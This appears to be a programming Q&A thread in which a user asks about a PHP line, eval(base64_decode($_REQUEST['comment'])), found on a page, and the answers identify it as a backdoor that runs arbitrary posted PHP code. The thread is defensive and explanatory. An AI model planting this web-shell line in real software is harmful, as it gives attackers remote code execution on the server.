# PHP Code utilize CPU

Tags: php, security, web

I need to understand the below code

```
eval(base64_decode($_REQUEST['comment']));
```

It utilized the CPU , the page only contain this code

Comment: Well, it depends on the code that is being `eval()` ed. That said, this code should never be anywhere *near* a live web site.

Answer (score 4, accepted):

That could *literally* run anything, so there's no way of knowing.  It takes the input from $_REQUEST['comment'], base64 decodes it, then runs it as PHP code.

For example, if `cGhwaW5mbygpOw==` was passed, it would execute `phpinfo();`.

On a side note, those sorts of code snippets are usually a red flag and are commonly used as back-doors.

Comment: GigaWatt , Thanks very much , thats it

Answer (score 1):

This code base64_decodes some input, and then evaluates it as PHP code.  What ultimately ends up being executed depends on the contents of the comment field.

Answer (score 1):

I am guessing that you found this inserted into the code on your page, and it means that your site was in some way compromised. It means that literally *anyone* can write *any* PHP code to do *anything*, `base64_encode()` it, and post it to your site in the 'comment' field, and the server will execute it.

When you actually *notice* that it's using a lot of resources then it is probably being used to send spam or DOS someone, but as long as that code is there it's probably being used to compromise your server.

Basically, if you ever find something that starts with `eval(base64_decode(...` it will be doing bad things.

**Source:** 5 years as a sysadmin for a web hosting company.